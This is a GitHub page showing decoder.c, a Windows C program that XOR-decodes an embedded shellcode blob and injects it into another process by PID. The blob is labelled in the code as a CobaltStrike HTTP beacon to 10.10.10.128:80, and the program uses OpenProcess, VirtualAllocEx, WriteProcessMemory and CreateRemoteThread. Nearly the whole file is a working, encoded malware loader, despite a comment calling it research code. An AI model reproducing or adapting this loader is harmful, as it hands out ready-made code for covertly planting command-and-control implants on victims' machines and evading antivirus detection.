-
Notifications
You must be signed in to change notification settings - Fork 29
/
Copy pathdecoder.c
77 lines (50 loc) · 5.46 KB
/
decoder.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include <windows.h>
// This code was written for researching purpose, you have to edit it before using it in real-world
// This code will deocde your shellcode and write it directly to the memory
int main(int argc, char* argv[]) {
// Our Shellcode (CobaltStrike HTTP Beacon 10.10.10.128:80)
unsigned char shellcode[] = "\xfd\x49\x82\xe5\xf1\xe9\xc9\x1\x1\x1\x40\x50\x40\x51\x53\x50\x57\x49\x30\xd3\x64\x49\x8a\x53\x61\x49\x8a\x53\x19\x49\x8a\x53\x21\x49\x8a\x73\x51\x49\xe\xb6\x4b\x4b\x4c\x30\xc8\x49\x30\xc1\xad\x3d\x60\x7d\x3\x2d\x21\x40\xc0\xc8\xc\x40\x0\xc0\xe3\xec\x53\x40\x50\x49\x8a\x53\x21\x8a\x43\x3d\x49\x0\xd1\x67\x80\x79\x19\xa\x3\x74\x73\x8a\x81\x89\x1\x1\x1\x49\x84\xc1\x75\x66\x49\x0\xd1\x51\x8a\x49\x19\x45\x8a\x41\x21\x48\x0\xd1\xe2\x57\x49\xfe\xc8\x40\x8a\x35\x89\x49\x0\xd7\x4c\x30\xc8\x49\x30\xc1\xad\x40\xc0\xc8\xc\x40\x0\xc0\x39\xe1\x74\xf0\x4d\x2\x4d\x25\x9\x44\x38\xd0\x74\xd9\x59\x45\x8a\x41\x25\x48\x0\xd1\x67\x40\x8a\xd\x49\x45\x8a\x41\x1d\x48\x0\xd1\x40\x8a\x5\x89\x49\x0\xd1\x40\x59\x40\x59\x5f\x58\x5b\x40\x59\x40\x58\x40\x5b\x49\x82\xed\x21\x40\x53\xfe\xe1\x59\x40\x58\x5b\x49\x8a\x13\xe8\x4e\xfe\xfe\xfe\x5c\x6b\x1\x48\xbf\x76\x68\x6f\x68\x6f\x64\x75\x1\x40\x57\x48\x88\xe7\x4d\x88\xf0\x40\xbb\x4d\x76\x27\x6\xfe\xd4\x49\x30\xc8\x49\x30\xd3\x4c\x30\xc1\x4c\x30\xc8\x40\x51\x40\x51\x40\xbb\x3b\x57\x78\xa6\xfe\xd4\xea\x72\x5b\x49\x88\xc0\x40\xb9\x51\x1\x1\x1\x4c\x30\xc8\x40\x50\x40\x50\x6b\x2\x40\x50\x40\xbb\x56\x88\x9e\xc7\xfe\xd4\xea\x58\x5a\x49\x88\xc0\x49\x30\xd3\x48\x88\xd9\x4c\x30\xc8\x53\x69\x1\x3\x41\x85\x53\x53\x40\xbb\xea\x54\x2f\x3a\xfe\xd4\x49\x88\xc7\x49\x82\xc2\x51\x6b\xb\x5e\x49\x88\xf0\x49\x88\xdb\x48\xc6\xc1\xfe\xfe\xfe\xfe\x4c\x30\xc8\x53\x53\x40\xbb\x2c\x7\x19\x7a\xfe\xd4\x84\xc1\xe\x84\x9c\x0\x1\x1\x49\xfe\xce\xe\x85\x8d\x0\x1\x1\xea\xd2\xe8\xe5\x0\x1\x1\xe9\xa3\xfe\xfe\xfe\x2e\x63\x42\x75\x45\x1\x92\xd6\x1e\x1d\x3c\xba\x8b\xa2\x4e\xaa\x68\x7f\xc3\x11\x3f\xb9\xd8\xc5\xcf\x7c\x9b\x72\x3\xf8\x32\xc7\xac\x11\x4c\xbc\x86\x61\xc0\x98\x51\x9a\xe9\x23\x99\xbd\xca\x85\xf\xc2\x83\xc7\x13\x1b\x20\x9f\x6e\x62\xe3\xb3\xbd\x3c\x91\xb\x4\xd9\x6d\xe4\x2c\xc\x11\xe6\xc1\x17\xf7\x4\xf4\xc\xbb\x1\x54\x72\x64\x73\x2c\x40\x66\x64\x6f\x75\x3b\x21\x4c\x6e\x7b\x68\x6d\x6d\x60\x2e\x35\x2f\x31\x21\x29\x62\x6e\x6c\x71\x60\x75\x68\x63\x6d\x64\x3a\x21\x4c\x52\x48\x44\x21\x39\x2f\x31\x3a\x21\x56\x68\x6f\x65\x6e\x76\x72\x21\x4f\x55\x21\x37\x2f\x30\x3a\x21\x55\x73\x68\x65\x64\x6f\x75\x2e\x35\x2f\x31\x28\xc\xb\x1\x3e\x3b\x54\xcb\x1c\x5e\x53\x34\x99\x98\x7b\x89\xd6\xb8\xcf\x1b\xce\x44\x11\x46\x4f\x85\x18\xb4\x6c\xc0\xec\x3b\xde\xda\xc0\xf6\x44\x7\x8b\x3b\x2d\x64\x51\x16\x27\xf9\x61\xdb\xf2\x18\x65\xb5\x36\x11\x9e\x48\x1f\x62\x68\x7e\xb5\xad\x10\xc5\x2b\xde\x72\xfa\xe\x8f\xbd\x34\xc2\x82\xec\x7b\xbf\x76\xba\x7e\xbc\x6c\xb8\xa6\xda\xf5\xdd\xd4\x5b\x45\xd1\x89\x18\xa3\x3b\x20\xca\x78\x17\x9\x28\xd3\x4\x55\x1f\xdb\xf2\xdd\x20\x73\x52\x1f\x86\xb2\x11\x7c\xfd\xe8\xf9\x1d\x43\xa3\xd0\xbf\x2d\x9e\x77\xb8\x17\xbe\x9f\x18\xb\x63\xcd\x0\x21\x2f\x3f\x72\x24\xb3\x1d\x7b\xc6\x67\x4\xf2\xf0\x6c\x30\xe1\xec\x19\x70\x45\x4f\x61\xc1\x1d\x8c\x6e\x9a\xb2\x54\x7b\xf4\xf2\x73\xba\xfa\xe6\x6d\xda\x71\xa7\x23\x8c\x30\xcb\xf3\x1a\x57\xd5\x30\x2d\x38\x90\xac\x1\x22\xe2\xe\x9c\x9f\x7d\xb0\xe4\xcf\x37\xc6\xdd\x7e\xac\xba\x0\x9e\x86\x32\x5c\xea\xf\x20\xbc\x48\xb\xca\xa\x72\xd7\x95\xd1\x55\xa0\x48\x17\x70\xf1\x8e\x1\x40\xbf\xf1\xb4\xa3\x57\xfe\xd4\x49\x30\xc8\xbb\x1\x1\x41\x1\x40\xb9\x1\x11\x1\x1\x40\xb8\x41\x1\x1\x1\x40\xbb\x59\xa5\x52\xe4\xfe\xd4\x49\x92\x52\x52\x49\x88\xe6\x49\x88\xf0\x49\x88\xdb\x40\xb9\x1\x21\x1\x1\x48\x88\xf8\x40\xbb\x13\x97\x88\xe3\xfe\xd4\x49\x82\xc5\x21\x84\xc1\x75\xb7\x67\x8a\x6\x49\x0\xc2\x84\xc1\x74\xd6\x59\x59\x59\x49\x4\x1\x1\x1\x1\x51\xc2\xe9\x9e\xfc\xfe\xfe\x30\x31\x2f\x30\x31\x2f\x30\x31\x2f\x30\x33\x39\x1\x55\xbe\xbe\x8d";
// Check arguments counter
if(argc != 2){
printf("[+] Usage : decoder.exe [PID]\n");
exit(0);
}
// The process id we want to inject our code to passed to the executable
// Use GetCurrentProcessId() to inject the shellcode into original process
int process_id = atoi(argv[1]);
// Define the base_address variable which will save the allocated memory address
LPVOID base_address;
// Retrive the process handle using OpenProcess
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);
if (process) {
printf("[+] Handle retrieved successfully!\n");
printf("[+] Handle value is %p\n", process);
base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (base_address) {
printf("[+] Allocated based address is 0x%x\n", base_address);
// Data chars counter
int i;
// Base address counter
int n = 0;
for(i = 0; i<=sizeof(shellcode); i++){
// Decode shellcode opcode (you can edit it based on your encoder settings)
char DecodedOpCode = shellcode[i] ^ 0x01;
// Write the decoded bytes in memory address
if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){
// Write the memory address where the data was written
printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n);
// Increase memory address by 1
n++;
}
}
// Run our code as RemoteThread
CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, NULL, 0x50002);
}
else {
printf("[+] Unable to allocate memory ..\n");
}
}
else {
printf("[-] Enable to retrieve process handle\n");
}
}